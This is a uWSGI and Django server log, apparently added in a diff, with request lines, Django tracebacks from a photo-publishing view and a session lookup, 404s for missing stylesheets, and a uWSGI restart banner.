+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 203, in publish
+ t_photo_path = 'static/img/t_photo/' + str(t_id) + '_' + t_photo.name
+AttributeError: 'NoneType' object has no attribute 'name'
+[pid: 18395|app: 0|req: 9/9] 117.100.100.38 () {48 vars in 1567 bytes} [Fri Jan 8 13:36:37 2021] POST /publish/ => generated 60822 bytes in 29 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 0)
+sfdfd ewewew
+Internal Server Error: /publish/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 203, in publish
+ t_photo_path = 'static/img/t_photo/' + str(t_id) + '_' + t_photo.name
+AttributeError: 'NoneType' object has no attribute 'name'
+[pid: 18395|app: 0|req: 10/10] 117.100.100.38 () {48 vars in 1567 bytes} [Fri Jan 8 13:36:52 2021] POST /publish/ => generated 60832 bytes in 27 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 1)
+sfdfd ewewew
+[pid: 18395|app: 0|req: 11/11] 117.100.100.38 () {48 vars in 1569 bytes} [Fri Jan 8 13:37:01 2021] POST /publish/ => generated 0 bytes in 413 msecs (HTTP/1.1 302) 7 headers in 202 bytes (17 switches on core 0)
+[pid: 18395|app: 0|req: 12/12] 117.100.100.38 () {42 vars in 1421 bytes} [Fri Jan 8 13:37:02 2021] GET /single/4 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1)
+[pid: 18395|app: 0|req: 13/13] 117.100.100.38 () {42 vars in 1423 bytes} [Fri Jan 8 13:37:02 2021] GET /single/4/ => generated 8198 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18395|app: -1|req: -1/14] 117.100.100.38 () {38 vars in 1285 bytes} [Fri Jan 8 13:37:02 2021] GET /static/js/jquery.easing.1.3.js => generated 8097 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 18395|app: -1|req: -1/15] 117.100.100.38 () {38 vars in 1283 bytes} [Fri Jan 8 13:37:02 2021] GET /static/js/jquery.quicksand.js => generated 14697 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 18395|app: -1|req: -1/16] 117.100.100.38 () {38 vars in 1313 bytes} [Fri Jan 8 13:37:02 2021] GET /static/img/t_photo/4_2.png => generated 88960 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 18395|app: 0|req: 14/17] 117.100.100.38 () {40 vars in 1355 bytes} [Fri Jan 8 13:37:27 2021] GET / => generated 7795 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 18395|app: 0|req: 15/18] 117.100.100.38 () {40 vars in 1382 bytes} [Fri Jan 8 13:37:29 2021] GET /publish/ => generated 4909 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+0
+0
+[, ]
+[pid: 18395|app: 0|req: 16/19] 117.100.100.38 () {40 vars in 1384 bytes} [Fri Jan 8 13:37:33 2021] GET /all-1-0-0 => generated 9093 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/img/t_photo/1_2.png
+[pid: 18395|app: 0|req: 17/20] 117.100.100.38 () {38 vars in 1313 bytes} [Fri Jan 8 13:37:33 2021] GET /static/img/t_photo/1_2.png => generated 3442 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /None
+[pid: 18395|app: 0|req: 18/21] 117.100.100.38 () {38 vars in 1269 bytes} [Fri Jan 8 13:37:33 2021] GET /None => generated 3376 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18395|app: 0|req: 19/22] 117.100.100.38 () {42 vars in 1423 bytes} [Fri Jan 8 13:37:41 2021] GET /single/4/ => generated 8198 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18395|app: -1|req: -1/23] 117.100.100.38 () {40 vars in 1368 bytes} [Fri Jan 8 13:37:41 2021] GET /static/img/t_photo/4_2.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 38, in home
+ response['uid'] = request.session['uid']
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__
+ return self._session[key]
+KeyError: 'uid'
+[pid: 18395|app: 0|req: 20/24] 223.104.39.100 () {38 vars in 935 bytes} [Fri Jan 8 13:38:16 2021] GET / => generated 57925 bytes in 25 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 0)
+Not Found: /favicon.ico
+[pid: 18395|app: 0|req: 21/25] 223.104.39.100 () {38 vars in 907 bytes} [Fri Jan 8 13:38:17 2021] GET /favicon.ico => generated 3397 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 38, in home
+ response['uid'] = request.session['uid']
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__
+ return self._session[key]
+KeyError: 'uid'
+[pid: 18395|app: 0|req: 22/26] 223.104.39.100 () {38 vars in 935 bytes} [Fri Jan 8 13:38:18 2021] GET / => generated 57925 bytes in 25 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 1)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 38, in home
+ response['uid'] = request.session['uid']
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__
+ return self._session[key]
+KeyError: 'uid'
+[pid: 18395|app: 0|req: 23/27] 223.104.39.100 () {38 vars in 935 bytes} [Fri Jan 8 13:38:25 2021] GET / => generated 57925 bytes in 25 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 0)
+[pid: 18395|app: 0|req: 24/28] 117.100.100.38 () {42 vars in 1423 bytes} [Fri Jan 8 13:38:47 2021] GET /single/4/ => generated 8198 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18395|app: -1|req: -1/29] 117.100.100.38 () {40 vars in 1368 bytes} [Fri Jan 8 13:38:48 2021] GET /static/img/t_photo/4_2.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 18395|app: 0|req: 25/30] 117.100.100.38 () {38 vars in 1324 bytes} [Fri Jan 8 13:39:05 2021] GET / => generated 7795 bytes in 6 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 38, in home
+ response['uid'] = request.session['uid']
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__
+ return self._session[key]
+KeyError: 'uid'
+[pid: 18395|app: 0|req: 26/31] 61.151.178.236 () {32 vars in 540 bytes} [Fri Jan 8 13:39:17 2021] GET / => generated 57184 bytes in 33 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 1)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 38, in home
+ response['uid'] = request.session['uid']
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__
+ return self._session[key]
+KeyError: 'uid'
+[pid: 18395|app: 0|req: 27/32] 61.129.6.174 () {32 vars in 538 bytes} [Fri Jan 8 13:39:20 2021] GET / => generated 57182 bytes in 28 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 0)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 38, in home
+ response['uid'] = request.session['uid']
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__
+ return self._session[key]
+KeyError: 'uid'
+[pid: 18395|app: 0|req: 28/33] 117.100.100.38 () {36 vars in 626 bytes} [Fri Jan 8 13:39:20 2021] GET / => generated 57452 bytes in 24 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 1)
+Not Found: /favicon.ico
+[pid: 18395|app: 0|req: 29/34] 117.100.100.38 () {36 vars in 595 bytes} [Fri Jan 8 13:39:22 2021] GET /favicon.ico => generated 3397 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Fri Jan 8 13:39:51 2021 - uWSGI worker 1 screams: UAAAAAAH my master disconnected: i will kill myself !!!
+Fri Jan 8 13:39:51 2021 - uWSGI worker 1 screams: UAAAAAAH my master disconnected: i will kill myself !!!
+*** Starting uWSGI 2.0.19.1 (64bit) on [Fri Jan 8 21:39:52 2021] ***
+compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 08 January 2021 13:09:04
+os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020
+nodename: VM-0-13-centos
+machine: x86_64
+clock source: unix
+pcre jit disabled
+detected number of CPU cores: 1
+current working directory: /
+detected binary path: /www/wwwroot/master/master_venv/bin/uwsgi
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+chdir() to /www/wwwroot/master
+your processes number limit is 7269
+your memory page size is 4096 bytes
+detected max file descriptor number: 1024
+!!! no /etc/mime.types file found !!!
+lock engine: pthread robust mutexes
+thunder lock: disabled (you can enable it with --thunder-lock)
+uWSGI http bound on 0.0.0.0:8080 fd 4
+uwsgi socket 0 bound to TCP address 127.0.0.1:40520 (port auto-assigned) fd 3
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+Python version: 3.7.8 (default, Jul 6 2020, 09:48:19) [GCC 4.8.5 20150623 (Red Hat 4.8.5-39)]
+Python main interpreter initialized at 0x246c9c0
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+python threads support enabled
+your server socket listen backlog is limited to 100 connections
+your mercy for graceful operations on workers is 60 seconds
+mapped 166752 bytes (162 KB) for 2 cores
+*** Operational MODE: threaded ***
+ModuleNotFoundError: No module named 'master'
+unable to load app 0 (mountpoint='') (callable not found or import error)
+WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x246c9c0 pid: 18964 (default app)
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+*** uWSGI is running in multiple interpreter mode ***
+spawned uWSGI master process (pid: 18964)
+spawned uWSGI worker 1 (pid: 18965, cores: 2)
+spawned uWSGI http 1 (pid: 18966)
+[pid: 18965|app: 0|req: 1/1] 117.100.100.38 () {36 vars in 626 bytes} [Fri Jan 8 13:40:03 2021] GET / => generated 6416 bytes in 44 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: -1|req: -1/2] 117.100.100.38 () {38 vars in 714 bytes} [Fri Jan 8 13:40:03 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/3] 117.100.100.38 () {38 vars in 697 bytes} [Fri Jan 8 13:40:03 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/4] 117.100.100.38 () {38 vars in 722 bytes} [Fri Jan 8 13:40:03 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/5] 117.100.100.38 () {38 vars in 718 bytes} [Fri Jan 8 13:40:04 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/6] 117.100.100.38 () {38 vars in 736 bytes} [Fri Jan 8 13:40:04 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/7] 117.100.100.38 () {38 vars in 716 bytes} [Fri Jan 8 13:40:04 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/8] 117.100.100.38 () {38 vars in 695 bytes} [Fri Jan 8 13:40:04 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/9] 117.100.100.38 () {38 vars in 713 bytes} [Fri Jan 8 13:40:04 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/10] 117.100.100.38 () {38 vars in 711 bytes} [Fri Jan 8 13:40:04 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/11] 117.100.100.38 () {38 vars in 703 bytes} [Fri Jan 8 13:40:05 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/12] 117.100.100.38 () {38 vars in 716 bytes} [Fri Jan 8 13:40:24 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+Not Found: /static/img/apple-touch-icon-114x114.png
+[pid: 18965|app: 0|req: 2/13] 117.100.100.38 () {38 vars in 740 bytes} [Fri Jan 8 13:40:24 2021] GET /static/img/apple-touch-icon-114x114.png => generated 3481 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: -1|req: -1/14] 117.100.100.38 () {38 vars in 706 bytes} [Fri Jan 8 13:40:24 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/15] 117.100.100.38 () {38 vars in 738 bytes} [Fri Jan 8 13:40:24 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: 0|req: 3/16] 117.100.100.38 () {40 vars in 773 bytes} [Fri Jan 8 13:40:33 2021] GET /my-admin => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 4/17] 117.100.100.38 () {40 vars in 775 bytes} [Fri Jan 8 13:40:33 2021] GET /my-admin/ => generated 5354 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 5/18] 117.100.100.38 () {48 vars in 926 bytes} [Fri Jan 8 13:40:46 2021] POST /my-admin/ => generated 27 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 6/19] 117.100.100.38 () {40 vars in 830 bytes} [Fri Jan 8 13:40:46 2021] GET /admin-home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 180 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 7/20] 117.100.100.38 () {40 vars in 832 bytes} [Fri Jan 8 13:40:46 2021] GET /admin-home/ => generated 12638 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+[pid: 18965|app: -1|req: -1/21] 117.100.100.38 () {38 vars in 827 bytes} [Fri Jan 8 13:40:47 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 150996 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/22] 117.100.100.38 () {38 vars in 761 bytes} [Fri Jan 8 13:40:47 2021] GET /static/css/style.css => generated 118751 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/23] 117.100.100.38 () {38 vars in 773 bytes} [Fri Jan 8 13:40:47 2021] GET /static/css/colors/blue.css => generated 3905 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/24] 117.100.100.38 () {38 vars in 790 bytes} [Fri Jan 8 13:40:47 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/25] 117.100.100.38 () {38 vars in 802 bytes} [Fri Jan 8 13:40:47 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 24900 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/26] 117.100.100.38 () {38 vars in 808 bytes} [Fri Jan 8 13:40:47 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 46653 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/27] 117.100.100.38 () {38 vars in 766 bytes} [Fri Jan 8 13:40:47 2021] GET /static/js/jquery.slimscroll.js => generated 4475 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/28] 117.100.100.38 () {38 vars in 742 bytes} [Fri Jan 8 13:40:49 2021] GET /static/js/waves.js => generated 4237 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/29] 117.100.100.38 () {38 vars in 754 bytes} [Fri Jan 8 13:40:49 2021] GET /static/js/sidebarmenu.js => generated 10298 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/30] 117.100.100.38 () {38 vars in 830 bytes} [Fri Jan 8 13:40:49 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 3268 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/31] 117.100.100.38 () {38 vars in 752 bytes} [Fri Jan 8 13:40:49 2021] GET /static/js/custom.min.js => generated 1436 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/32] 117.100.100.38 () {38 vars in 826 bytes} [Fri Jan 8 13:40:49 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 1433 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 18965|app: 0|req: 8/33] 117.100.100.38 () {38 vars in 840 bytes} [Fri Jan 8 13:40:49 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 18965|app: 0|req: 9/34] 117.100.100.38 () {38 vars in 852 bytes} [Fri Jan 8 13:40:49 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 18965|app: 0|req: 10/35] 117.100.100.38 () {38 vars in 844 bytes} [Fri Jan 8 13:40:49 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 18965|app: 0|req: 11/36] 117.100.100.38 () {38 vars in 808 bytes} [Fri Jan 8 13:40:49 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 18965|app: 0|req: 12/37] 117.100.100.38 () {38 vars in 828 bytes} [Fri Jan 8 13:40:50 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 18965|app: 0|req: 13/38] 117.100.100.38 () {38 vars in 828 bytes} [Fri Jan 8 13:40:50 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 18965|app: 0|req: 14/39] 117.100.100.38 () {38 vars in 884 bytes} [Fri Jan 8 13:40:50 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 18965|app: 0|req: 15/40] 117.100.100.38 () {38 vars in 776 bytes} [Fri Jan 8 13:40:50 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 18965|app: 0|req: 16/41] 117.100.100.38 () {38 vars in 774 bytes} [Fri Jan 8 13:40:50 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 17/42] 117.100.100.38 () {40 vars in 836 bytes} [Fri Jan 8 13:40:56 2021] GET /announcement => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 182 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 18/43] 117.100.100.38 () {40 vars in 838 bytes} [Fri Jan 8 13:40:56 2021] GET /announcement/ => generated 7409 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: -1|req: -1/44] 117.100.100.38 () {38 vars in 768 bytes} [Fri Jan 8 13:40:56 2021] GET /static/js/jquery.slimscroll.js => generated 4475 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 18965|app: 0|req: 19/45] 117.100.100.38 () {38 vars in 840 bytes} [Fri Jan 8 13:40:56 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 18965|app: 0|req: 20/46] 117.100.100.38 () {38 vars in 852 bytes} [Fri Jan 8 13:40:56 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 18965|app: 0|req: 21/47] 117.100.100.38 () {38 vars in 844 bytes} [Fri Jan 8 13:40:56 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 18965|app: 0|req: 22/48] 117.100.100.38 () {38 vars in 808 bytes} [Fri Jan 8 13:40:56 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 18965|app: 0|req: 23/49] 117.100.100.38 () {38 vars in 828 bytes} [Fri Jan 8 13:40:56 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 18965|app: 0|req: 24/50] 117.100.100.38 () {38 vars in 828 bytes} [Fri Jan 8 13:40:56 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 18965|app: 0|req: 25/51] 117.100.100.38 () {38 vars in 884 bytes} [Fri Jan 8 13:40:56 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 18965|app: 0|req: 26/52] 117.100.100.38 () {38 vars in 776 bytes} [Fri Jan 8 13:40:56 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 18965|app: 0|req: 27/53] 117.100.100.38 () {38 vars in 774 bytes} [Fri Jan 8 13:40:56 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 28/54] 117.100.100.38 () {40 vars in 836 bytes} [Fri Jan 8 13:40:58 2021] GET /kind-manage => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 29/55] 117.100.100.38 () {40 vars in 838 bytes} [Fri Jan 8 13:40:58 2021] GET /kind-manage/ => generated 10151 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 18965|app: 0|req: 30/56] 117.100.100.38 () {38 vars in 840 bytes} [Fri Jan 8 13:40:58 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
